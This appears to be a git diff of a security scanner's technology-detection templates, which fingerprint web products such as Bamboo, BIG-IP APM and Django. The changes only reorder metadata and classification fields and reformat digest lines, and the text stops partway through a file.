+# digest: 4a0a004730450220048cb3b4991d02e731d9fce6eea113c4b84e5639f85a867281f1ae48f106f9f8022100e3e48abd4c96c7d584806ba355fb6ac163786e36d4a4768b56c68908ee46e44d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/autobahn-python-detect.yaml b/http/technologies/autobahn-python-detect.yaml
index 1cc2c24c59..8463c2511a 100644
--- a/http/technologies/autobahn-python-detect.yaml
+++ b/http/technologies/autobahn-python-detect.yaml
@@ -4,15 +4,15 @@ info:
name: Autobahn-Python Webserver Detect
author: pussycat0x
severity: info
- metadata:
- max-request: 1
- shodan-query: "AutobahnPython"
- product: autobahn
- vendor: crossbar
- tags: tech,webserver
-
classification:
cpe: cpe:2.3:a:crossbar:autobahn:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: crossbar
+ product: autobahn
+ shodan-query: "AutobahnPython"
+ tags: tech,webserver
+
http:
- method: GET
path:
@@ -34,4 +34,4 @@ http:
regex:
- 'AutobahnPython([ 0-9.]+)'
-# digest: 4a0a004730450220299433f7a72c6c61f07be31feb69fbd48adc66cd0448767c424a96c597a762f7022100cc56d7af729b231f58beaee35f874d397f81497e67985ffb7c2d9c1f74131a56:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a004730450220299433f7a72c6c61f07be31feb69fbd48adc66cd0448767c424a96c597a762f7022100cc56d7af729b231f58beaee35f874d397f81497e67985ffb7c2d9c1f74131a56:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/avideo-detect.yaml b/http/technologies/avideo-detect.yaml
index 8aca9952e5..cc5111548b 100644
--- a/http/technologies/avideo-detect.yaml
+++ b/http/technologies/avideo-detect.yaml
@@ -4,17 +4,17 @@ info:
name: Avideo Detect
author: pikpikcu
severity: info
+ classification:
+ cpe: cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
+ vendor: wwbn
+ product: avideo
shodan-query: http.title:"AVideo"
fofa-query: "AVideo"
- product: avideo
- vendor: wwbn
tags: tech,avideo
- classification:
- cpe: cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -42,4 +42,4 @@ http:
status:
- 200
-# digest: 4a0a00473045022100cf44559df8ac7ad08f8773c5424774c8df0edec3ba3f0828d263691c32f7464d02206f3c7f5afe59bc26e4f49303b4893ceb02b31aa4cd6eb8173f7c5e8053c7c16b:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100cf44559df8ac7ad08f8773c5424774c8df0edec3ba3f0828d263691c32f7464d02206f3c7f5afe59bc26e4f49303b4893ceb02b31aa4cd6eb8173f7c5e8053c7c16b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/b2b-builder-detect.yaml b/http/technologies/b2b-builder-detect.yaml
index f4c634db03..e4c2ac650c 100644
--- a/http/technologies/b2b-builder-detect.yaml
+++ b/http/technologies/b2b-builder-detect.yaml
@@ -4,15 +4,15 @@ info:
name: B2BBuilder Detect
author: ffffffff0x
severity: info
- metadata:
- max-request: 1
- fofa-query: app="B2BBuilder"
- product: b2b_script
- vendor: itechscripts
- tags: b2bbuilder,tech
-
classification:
cpe: cpe:2.3:a:itechscripts:b2b_script:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: itechscripts
+ product: b2b_script
+ fofa-query: app="B2BBuilder"
+ tags: b2bbuilder,tech
+
http:
- method: GET
path:
@@ -34,4 +34,4 @@ http:
status:
- 200
-# digest: 4a0a0047304502206e39c2d9d069c1dbbdf25da4823110180c1671be18e3991298429ecfd3ded82a022100ec6997de55c32816fded811c825724ac0c87ec5aea7996cf317783cae9b7e926:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502206e39c2d9d069c1dbbdf25da4823110180c1671be18e3991298429ecfd3ded82a022100ec6997de55c32816fded811c825724ac0c87ec5aea7996cf317783cae9b7e926:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/bamboo-detect.yaml b/http/technologies/bamboo-detect.yaml
index 26d0671e6b..7d61006e6a 100644
--- a/http/technologies/bamboo-detect.yaml
+++ b/http/technologies/bamboo-detect.yaml
@@ -6,17 +6,17 @@ info:
severity: info
description: |
Detect the presence of Bamboo, a CI/CD tool.
+ classification:
+ cpe: cpe:2.3:a:atlassian:bamboo:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: atlassian
+ product: bamboo
shodan-query: http.favicon.hash:-1379982221
category: devops
- product: bamboo
tags: tech,bamboo,atlassian,detect,cicd
- classification:
- cpe: cpe:2.3:a:atlassian:bamboo:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -35,4 +35,5 @@ http:
group: 1
regex:
- '(?i)atlassian bamboo version (.*) -'
-# digest: 490a00463044022054fee6be26df8b05fe917fc020a1087009848dc48a25b2df27954e6f1d71ac4802205b3267d31138e786117de003787658c20c23a8956efe95880a085e183df4ab62:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a00463044022054fee6be26df8b05fe917fc020a1087009848dc48a25b2df27954e6f1d71ac4802205b3267d31138e786117de003787658c20c23a8956efe95880a085e183df4ab62:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/bigbluebutton-detect.yaml b/http/technologies/bigbluebutton-detect.yaml
index 5149cf1409..518f0fd894 100644
--- a/http/technologies/bigbluebutton-detect.yaml
+++ b/http/technologies/bigbluebutton-detect.yaml
@@ -4,15 +4,15 @@ info:
name: BigBlueButton Detect
author: pikpikcu
severity: info
- metadata:
- max-request: 1
- shodan-query: http.title:"BigBlueButton"
- product: bigbluebutton
- vendor: bigbluebutton
- tags: tech,bigbluebutton
-
classification:
cpe: cpe:2.3:a:bigbluebutton:bigbluebutton:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: bigbluebutton
+ product: bigbluebutton
+ shodan-query: http.title:"BigBlueButton"
+ tags: tech,bigbluebutton
+
http:
- method: GET
path:
@@ -29,4 +29,4 @@ http:
status:
- 200
-# digest: 4b0a00483046022100e3bb53afa3cae70ad123439dbdff19f93dc7698770e9987bd76c4569d884558b022100bbe4fa7dc34d384632f8ee70adc8befbb53c7eb502d709f81c30a6b7e107593b:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100e3bb53afa3cae70ad123439dbdff19f93dc7698770e9987bd76c4569d884558b022100bbe4fa7dc34d384632f8ee70adc8befbb53c7eb502d709f81c30a6b7e107593b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/bigip-apm-detect.yaml b/http/technologies/bigip-apm-detect.yaml
index fc0b213b85..b56d6f8849 100644
--- a/http/technologies/bigip-apm-detect.yaml
+++ b/http/technologies/bigip-apm-detect.yaml
@@ -6,16 +6,16 @@ info:
severity: info
reference:
- https://my.f5.com/manage/s/article/K000138683
+ classification:
+ cpe: cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
- shodan-query: html:"BIG-IP APM"
- product: big-ip_access_policy_manager
vendor: f5
+ product: big-ip_access_policy_manager
+ shodan-query: html:"BIG-IP APM"
tags: bigip,tech,f5,detect
- classification:
- cpe: cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -39,4 +39,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502207cd8124890550ff38ab6b1d02a3c17e0c9d6caace23b7b4fa1f0a0c7c1cae777022100d57a340eb62ed44b815752fc532b652b8a782c1dbe959bc4d24254fe212e7053:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a0047304502207cd8124890550ff38ab6b1d02a3c17e0c9d6caace23b7b4fa1f0a0c7c1cae777022100d57a340eb62ed44b815752fc532b652b8a782c1dbe959bc4d24254fe212e7053:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/casaos-detection.yaml b/http/technologies/casaos-detection.yaml
index b783015182..140db12cfe 100644
--- a/http/technologies/casaos-detection.yaml
+++ b/http/technologies/casaos-detection.yaml
@@ -6,16 +6,16 @@ info:
severity: info
reference:
- https://github.com/IceWhaleTech/CasaOS
- metadata:
- max-request: 1
- shodan-query: http.html:"/CasaOS-UI/public/index.html"
- fofa-query: body="/CasaOS-UI/public/index.html"
- product: casaos
- vendor: icewhale
- tags: casaos,tech,oss
-
classification:
cpe: cpe:2.3:o:icewhale:casaos:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: icewhale
+ product: casaos
+ shodan-query: http.html:"/CasaOS-UI/public/index.html"
+ fofa-query: body="/CasaOS-UI/public/index.html"
+ tags: casaos,tech,oss
+
http:
- method: GET
path:
@@ -32,4 +32,4 @@ http:
regex:
- CasaOS Version:\s*([0-9.]+)
-# digest: 490a004630440220477bd4b3de6e4497c9e589ce0fe9ee5b0053fd63a04b819d1bed73c6bfb3d93602205b0986e3fab04b5edd5c48b3179839a9aa8f3afa6e345ed2aade3838019a3a6e:922c64590222798bb761d5b6d8e72950
+# digest: 490a004630440220477bd4b3de6e4497c9e589ce0fe9ee5b0053fd63a04b819d1bed73c6bfb3d93602205b0986e3fab04b5edd5c48b3179839a9aa8f3afa6e345ed2aade3838019a3a6e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/checkpoint-mobile-detect.yaml b/http/technologies/checkpoint-mobile-detect.yaml
index dc31d73f8b..5bbaf7436d 100644
--- a/http/technologies/checkpoint-mobile-detect.yaml
+++ b/http/technologies/checkpoint-mobile-detect.yaml
@@ -8,16 +8,16 @@ info:
Check Point Mobile SSL VPN was detected.
reference:
- https://www.checkpoint.com/quantum/remote-access-vpn/
+ classification:
+ cpe: cpe:2.3:a:checkpoint:mobile_access_portal_agent:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.html:"Check Point Mobile"
- product: mobile_access_portal_agent
vendor: checkpoint
+ product: mobile_access_portal_agent
+ shodan-query: http.html:"Check Point Mobile"
tags: panel,checkpoint,detect
- classification:
- cpe: cpe:2.3:a:checkpoint:mobile_access_portal_agent:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -37,4 +37,4 @@ http:
status:
- 403
-# digest: 4b0a0048304602210096fd8cd25e09a5330a5a44abb2f26ade9700d4445d954f16aaaed67ac566c15f022100f5ad48424d901e210b809d9055b6d2400ce21081e07a55fc8a8fc3bb0a6a2b40:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a0048304602210096fd8cd25e09a5330a5a44abb2f26ade9700d4445d954f16aaaed67ac566c15f022100f5ad48424d901e210b809d9055b6d2400ce21081e07a55fc8a8fc3bb0a6a2b40:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/chevereto-detect.yaml b/http/technologies/chevereto-detect.yaml
index 56a8aeb450..1553c2a0df 100644
--- a/http/technologies/chevereto-detect.yaml
+++ b/http/technologies/chevereto-detect.yaml
@@ -4,15 +4,15 @@ info:
name: Chevereto detect
author: pikpikcu
severity: info
- metadata:
- max-request: 1
- shodan-query: http.title:"Centreon"
- product: chevereto
- vendor: chevereto
- tags: tech,chevereto
-
classification:
cpe: cpe:2.3:a:chevereto:chevereto:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: chevereto
+ product: chevereto
+ shodan-query: http.title:"Centreon"
+ tags: tech,chevereto
+
http:
- method: GET
path:
@@ -36,4 +36,4 @@ http:
regex:
- ''
-# digest: 4a0a00473045022014a00f02654b7441a62a5487fa97a4dfb2b42b10ff52610250863e802248e946022100bf643ed2a5a696104fc676e749d9b282532168314704a8b8e7d5bd0a52d537da:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022014a00f02654b7441a62a5487fa97a4dfb2b42b10ff52610250863e802248e946022100bf643ed2a5a696104fc676e749d9b282532168314704a8b8e7d5bd0a52d537da:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/citrix-hypervisor-page.yaml b/http/technologies/citrix-hypervisor-page.yaml
index eb14c6f599..f021fee40d 100644
--- a/http/technologies/citrix-hypervisor-page.yaml
+++ b/http/technologies/citrix-hypervisor-page.yaml
@@ -4,16 +4,16 @@ info:
name: Citrix Hypervisor Page Detection
author: pussycat0x
severity: info
+ classification:
+ cpe: cpe:2.3:o:citrix:hypervisor:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.title:"Welcome to Citrix Hypervisor"
- product: hypervisor
vendor: citrix
+ product: hypervisor
+ shodan-query: http.title:"Welcome to Citrix Hypervisor"
tags: tech,citrix,default-page
- classification:
- cpe: cpe:2.3:o:citrix:hypervisor:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -39,4 +39,4 @@ http:
regex:
- "Welcome to Citrix Hypervisor ([0-9. ]+)"
-# digest: 4a0a00473045022100d197a97e2c344aac1af60be5ac7fb0c409e62af9605e39e8f80f2d443929894202200e1931019b121c5c772c78bd5de7c1e664be0a005b6cdc5e91aeffff27d254d7:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100d197a97e2c344aac1af60be5ac7fb0c409e62af9605e39e8f80f2d443929894202200e1931019b121c5c772c78bd5de7c1e664be0a005b6cdc5e91aeffff27d254d7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/citrix-xenmobile-version.yaml b/http/technologies/citrix-xenmobile-version.yaml
index 5ea6e0b03d..607f43f787 100644
--- a/http/technologies/citrix-xenmobile-version.yaml
+++ b/http/technologies/citrix-xenmobile-version.yaml
@@ -6,16 +6,15 @@ info:
severity: info
description: |
Template for XenMobile-detection (even if login-page is deactivated) and the specific version and rolling patch from js/app/init.js endpoint
+ classification:
+ cpe: cpe:2.3:a:citrix:xenmobile_server:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
- shodan-query: "title:\"XenMobile - Console\""
- product: xenmobile_server
vendor: citrix
+ product: xenmobile_server
+ shodan-query: "title:\"XenMobile - Console\""
tags: tech,edb,citrix,version,detect
-
- classification:
- cpe: cpe:2.3:a:citrix:xenmobile_server:*:*:*:*:*:*:*:*
flow: http(1) && http(2)
http:
@@ -53,4 +52,5 @@ http:
group: 1
regex:
- 'v=([^"]+)'
-# digest: 4a0a00473045022100c40bea9cbdb42f2cf6c1b737a80bb2c695f0c77d720adbb6001c3acdb534e74002207275f0e0528ef6bac4cd2ac049c3a16605635c2ac0ee65b2efc725abedc44bf9:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100c40bea9cbdb42f2cf6c1b737a80bb2c695f0c77d720adbb6001c3acdb534e74002207275f0e0528ef6bac4cd2ac049c3a16605635c2ac0ee65b2efc725abedc44bf9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/connectwise-control-detect.yaml b/http/technologies/connectwise-control-detect.yaml
index 37c8c9cc08..161d89e729 100644
--- a/http/technologies/connectwise-control-detect.yaml
+++ b/http/technologies/connectwise-control-detect.yaml
@@ -4,16 +4,16 @@ info:
name: ConnectWise Control Detect
author: pikpikcu
severity: info
+ classification:
+ cpe: cpe:2.3:a:connectwise:control:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title="ConnectWise Control Remote Support Software"
- product: control
vendor: connectwise
+ product: control
+ shodan-query: title="ConnectWise Control Remote Support Software"
tags: tech,connectwise
- classification:
- cpe: cpe:2.3:a:connectwise:control:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -30,4 +30,4 @@ http:
status:
- 200
-# digest: 490a0046304402202f654d62f5cfb6f1a4952af8b0dc128d2864a61d733916645d0bc2bc8295951a02203fab760e024e86d37d64c3822ce3d9d5310f96e749fb5b84060bbdf658aebb4e:922c64590222798bb761d5b6d8e72950
+# digest: 490a0046304402202f654d62f5cfb6f1a4952af8b0dc128d2864a61d733916645d0bc2bc8295951a02203fab760e024e86d37d64c3822ce3d9d5310f96e749fb5b84060bbdf658aebb4e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/couchbase-sync-gateway.yaml b/http/technologies/couchbase-sync-gateway.yaml
index 605a41bca5..a291b360a4 100644
--- a/http/technologies/couchbase-sync-gateway.yaml
+++ b/http/technologies/couchbase-sync-gateway.yaml
@@ -4,15 +4,15 @@ info:
name: Couchbase Sync Gateway
author: dhiyaneshDk
severity: info
- metadata:
- max-request: 1
- shodan-query: html:"Couchbase Sync Gateway"
- product: sync_gateway
- vendor: couchbase
- tags: tech,couchbase
-
classification:
cpe: cpe:2.3:a:couchbase:sync_gateway:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: couchbase
+ product: sync_gateway
+ shodan-query: html:"Couchbase Sync Gateway"
+ tags: tech,couchbase
+
http:
- method: GET
path:
@@ -38,4 +38,4 @@ http:
regex:
- 'version":"Couchbase Sync Gateway\/([0-9.(;a-z)]+)'
-# digest: 4a0a0047304502200722734c2751dbf6947e94e9dc7e612e74069bf0d4d50fa3408f4692e0a412e4022100a38f3c41a249e9ea9502862e64aab6c906887ee0efbf1d56d15df56b321e2939:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502200722734c2751dbf6947e94e9dc7e612e74069bf0d4d50fa3408f4692e0a412e4022100a38f3c41a249e9ea9502862e64aab6c906887ee0efbf1d56d15df56b321e2939:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/craftercms-detect.yaml b/http/technologies/craftercms-detect.yaml
index d1281aefae..e7a636b424 100644
--- a/http/technologies/craftercms-detect.yaml
+++ b/http/technologies/craftercms-detect.yaml
@@ -8,16 +8,16 @@ info:
CrafterCMS was detected.
reference:
- https://craftercms.org/
+ classification:
+ cpe: cpe:2.3:a:craftercms:crafter_cms:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.title:"craftercms"
- product: crafter_cms
vendor: craftercms
+ product: crafter_cms
+ shodan-query: http.title:"craftercms"
tags: tech,craftercms,detect
- classification:
- cpe: cpe:2.3:a:craftercms:crafter_cms:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -37,4 +37,5 @@ http:
group: 1
regex:
- 'Copyright\s+\(C\)\s+([0-9-]+)\s+Crafter'
-# digest: 4b0a00483046022100e458cbb4bdc3e20cec88b73b90c65c423765ccfd6cca34c7dd45072194e4c22a022100ddbef9284a10c6b0f7d5940e7130502f5361cf2deb8483b5755d88dc8e3dda39:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100e458cbb4bdc3e20cec88b73b90c65c423765ccfd6cca34c7dd45072194e4c22a022100ddbef9284a10c6b0f7d5940e7130502f5361cf2deb8483b5755d88dc8e3dda39:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/cvsweb-detect.yaml b/http/technologies/cvsweb-detect.yaml
index 9625f9eaf2..6389c3cefc 100644
--- a/http/technologies/cvsweb-detect.yaml
+++ b/http/technologies/cvsweb-detect.yaml
@@ -8,18 +8,18 @@ info:
CVSweb is a WWW interface for CVS repositories with which you can browse a file hierarchy on your browser to view each file's revision history in a very handy manner.
reference:
- https://cvsweb.openbsd.org/
+ classification:
+ cpe: cpe:2.3:a:freebsd:cvsweb:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
+ vendor: freebsd
+ product: cvsweb
shodan-query: title:"cvsweb"
fofa-query: title="cvsweb"
zoomeye-query: title:cvsweb
- product: cvsweb
- vendor: freebsd
tags: tech,cvsweb,detect
- classification:
- cpe: cpe:2.3:a:freebsd:cvsweb:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -46,4 +46,4 @@ http:
regex:
- 'content=".*CVSweb\s*([0-9.]+)"'
-# digest: 490a0046304402205edaaf4869f5e99128f50d300e222b62e3ff929787c084f7271cd034d9b450f502201f253ad5141e8777d354f91ae7cbe61e6a7d08b2a944d9c2cd1b5e30c6ca3b01:922c64590222798bb761d5b6d8e72950
+# digest: 490a0046304402205edaaf4869f5e99128f50d300e222b62e3ff929787c084f7271cd034d9b450f502201f253ad5141e8777d354f91ae7cbe61e6a7d08b2a944d9c2cd1b5e30c6ca3b01:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/dash-panel-detect.yaml b/http/technologies/dash-panel-detect.yaml
index 10ceca67b9..292df5db8f 100644
--- a/http/technologies/dash-panel-detect.yaml
+++ b/http/technologies/dash-panel-detect.yaml
@@ -4,16 +4,16 @@ info:
name: Dash Panel Detect
author: tess
severity: info
+ classification:
+ cpe: cpe:2.3:a:dash:dash_core:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: html:"DashRenderer"
- product: dash_core
vendor: dash
+ product: dash_core
+ shodan-query: html:"DashRenderer"
tags: tech,dash
- classification:
- cpe: cpe:2.3:a:dash:dash_core:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -35,4 +35,4 @@ http:
status:
- 200
-# digest: 4a0a004730450220618eee2206cff4acc4a9f531eeadf6ef701dc62ba06109659ce044ca84e6e89f022100c0565b9f844f47b4ea79e0b021942c93aa9b76ae28abc4e31e65fa7973c3a922:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a004730450220618eee2206cff4acc4a9f531eeadf6ef701dc62ba06109659ce044ca84e6e89f022100c0565b9f844f47b4ea79e0b021942c93aa9b76ae28abc4e31e65fa7973c3a922:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/dedecms-detect.yaml b/http/technologies/dedecms-detect.yaml
index aa51d9a71a..01ed2503df 100644
--- a/http/technologies/dedecms-detect.yaml
+++ b/http/technologies/dedecms-detect.yaml
@@ -4,16 +4,16 @@ info:
name: DedeCMS Detect
author: ritikchaddha,pphuahua
severity: info
+ classification:
+ cpe: cpe:2.3:a:dedecms:dedecms:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
- shodan-query: title:"dedecms" || http.html:"power by dedecms"
- product: dedecms
vendor: dedecms
+ product: dedecms
+ shodan-query: title:"dedecms" || http.html:"power by dedecms"
tags: dedecms,tech
- classification:
- cpe: cpe:2.3:a:dedecms:dedecms:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -31,4 +31,4 @@ http:
- "status_code_2 == 200 && contains(body_2,'/plus/search.php')"
condition: or
-# digest: 4b0a00483046022100f2a254d9ca7e339d5f133823a68672e98e10238ed6271f38f42563f25ffc529a022100c9dde7ff33c0bd678edb3ffb20f2cd78c50c43dc9604c78f8a7a3bbfe014f3a3:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100f2a254d9ca7e339d5f133823a68672e98e10238ed6271f38f42563f25ffc529a022100c9dde7ff33c0bd678edb3ffb20f2cd78c50c43dc9604c78f8a7a3bbfe014f3a3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/default-apache-shiro.yaml b/http/technologies/default-apache-shiro.yaml
index cd23f7f24e..883007a851 100644
--- a/http/technologies/default-apache-shiro.yaml
+++ b/http/technologies/default-apache-shiro.yaml
@@ -4,16 +4,16 @@ info:
name: Apache Shiro Default Page
author: DhiyaneshDK
severity: info
+ classification:
+ cpe: cpe:2.3:a:apache:shiro:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"Apache Shiro Quickstart"
- product: shiro
vendor: apache
+ product: shiro
+ shodan-query: title:"Apache Shiro Quickstart"
tags: tech,apache,shiro
- classification:
- cpe: cpe:2.3:a:apache:shiro:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -30,4 +30,4 @@ http:
status:
- 200
-# digest: 490a0046304402206679e43f4e2125fa6ab7f37680f2c0464b2b7251690168259de5ac9c1f18fb51022071a731cd2862bb734edb2e7491f15198961599fa7ed8cb84bfa49805b92df0f3:922c64590222798bb761d5b6d8e72950
+# digest: 490a0046304402206679e43f4e2125fa6ab7f37680f2c0464b2b7251690168259de5ac9c1f18fb51022071a731cd2862bb734edb2e7491f15198961599fa7ed8cb84bfa49805b92df0f3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/default-cakephp-page.yaml b/http/technologies/default-cakephp-page.yaml
index 1ae6dc709e..a17420c40a 100644
--- a/http/technologies/default-cakephp-page.yaml
+++ b/http/technologies/default-cakephp-page.yaml
@@ -4,16 +4,16 @@ info:
name: CakePHP Default Page
author: DhiyaneshDK
severity: info
+ classification:
+ cpe: cpe:2.3:a:cakephp:cakephp:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: html:"Welcome to CakePHP"
- product: cakephp
vendor: cakephp
+ product: cakephp
+ shodan-query: html:"Welcome to CakePHP"
tags: tech,cakephp,default-page
- classification:
- cpe: cpe:2.3:a:cakephp:cakephp:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -39,4 +39,4 @@ http:
regex:
- "Welcome to CakePHP ([0-9.]+)"
-# digest: 4a0a00473045022100b3fe3a8d266ae3117251f52714d20b8333c07aba389daafb73668f303f7c83b8022039b1f0c99bc6e24b20fbfd6fb88ed88498441437586c45ed69a6ccd4c10ef795:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100b3fe3a8d266ae3117251f52714d20b8333c07aba389daafb73668f303f7c83b8022039b1f0c99bc6e24b20fbfd6fb88ed88498441437586c45ed69a6ccd4c10ef795:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/default-codeigniter-page.yaml b/http/technologies/default-codeigniter-page.yaml
index fdff67ed7b..f8c200d469 100644
--- a/http/technologies/default-codeigniter-page.yaml
+++ b/http/technologies/default-codeigniter-page.yaml
@@ -4,15 +4,15 @@ info:
name: Default CodeIgniter Page
author: dhiyaneshDK
severity: info
- metadata:
- max-request: 1
- shodan-query: http.title:"Welcome to CodeIgniter"
- product: codeigniter
- vendor: codeigniter
- tags: tech,codeigniter
-
classification:
cpe: cpe:2.3:a:codeigniter:codeigniter:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: codeigniter
+ product: codeigniter
+ shodan-query: http.title:"Welcome to CodeIgniter"
+ tags: tech,codeigniter
+
http:
- method: GET
path:
@@ -28,4 +28,4 @@ http:
status:
- 200
-# digest: 4b0a00483046022100f4e992a459c52b2e15d4e202219faf801f3d82e1c31c798c6a400d7f923c0ee502210096d6440219750e02b3176cbaf2e33f06598297f784355801a904c26295e486fa:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100f4e992a459c52b2e15d4e202219faf801f3d82e1c31c798c6a400d7f923c0ee502210096d6440219750e02b3176cbaf2e33f06598297f784355801a904c26295e486fa:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/default-django-page.yaml b/http/technologies/default-django-page.yaml
index 6218f685ba..71faf8db35 100644
--- a/http/technologies/default-django-page.yaml
+++ b/http/technologies/default-django-page.yaml
@@ -4,15 +4,15 @@ info:
name: Django Default Page
author: dhiyaneshDk
severity: info
- metadata:
- max-request: 1
- shodan-query: http.title:"The install worked successfully! Congratulations!"
- product: django
- vendor: djangoproject
- tags: tech,django
-
classification:
cpe: cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: djangoproject
+ product: django
+ shodan-query: http.title:"The install worked successfully! Congratulations!"
+ tags: tech,django
+
http:
- method: GET
path:
@@ -24,4 +24,4 @@ http:
- "The install worked successfully! Congratulations! "
part: body
-# digest: 4a0a00473045022100d8691337604d9ceebf998734906c8ff1cb8c8541377a7d21b71796c9ad1118340220626b095cab5aeeb6bb0e9e02a88bdfe1d7d2eae9684c262b9bac96aeb146b222:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100d8691337604d9ceebf998734906c8ff1cb8c8541377a7d21b71796c9ad1118340220626b095cab5aeeb6bb0e9e02a88bdfe1d7d2eae9684c262b9bac96aeb146b222:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/default-fastcgi-page.yaml b/http/technologies/default-fastcgi-page.yaml
index 3253bcd23e..8c32536721 100644
--- a/http/technologies/default-fastcgi-page.yaml
+++ b/http/technologies/default-fastcgi-page.yaml
@@ -4,15 +4,15 @@ info:
name: Fastcgi Default Test Page
author: dhiyaneshDk
severity: info
- metadata:
- max-request: 1
- shodan-query: http.title:"FastCGI"
- product: fcgi
- vendor: fastcgi
- tags: tech,fastcgi
-
classification:
cpe: cpe:2.3:a:fastcgi:fcgi:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: fastcgi
+ product: fcgi
+ shodan-query: http.title:"FastCGI"
+ tags: tech,fastcgi
+
http:
- method: GET
path:
@@ -24,4 +24,4 @@ http:
- "TurnKey NGINX PHP FastCGI Server "
part: body
-# digest: 4b0a004830460221009d9c3022e47a42f0074a131ea0e58a725701de85ca16d5ff245204b63089d259022100ad46b2a4e3bf2e755956e61000c6c6703cb5114351a2d0b05fd782efea66a16e:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a004830460221009d9c3022e47a42f0074a131ea0e58a725701de85ca16d5ff245204b63089d259022100ad46b2a4e3bf2e755956e61000c6c6703cb5114351a2d0b05fd782efea66a16e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/default-fedora-page.yaml b/http/technologies/default-fedora-page.yaml
index d77cfeadbc..577a30747d 100644
--- a/http/technologies/default-fedora-page.yaml
+++ b/http/technologies/default-fedora-page.yaml
@@ -4,15 +4,15 @@ info:
name: Fedora Default Test Page
author: dhiyaneshDk
severity: info
- metadata:
- max-request: 1
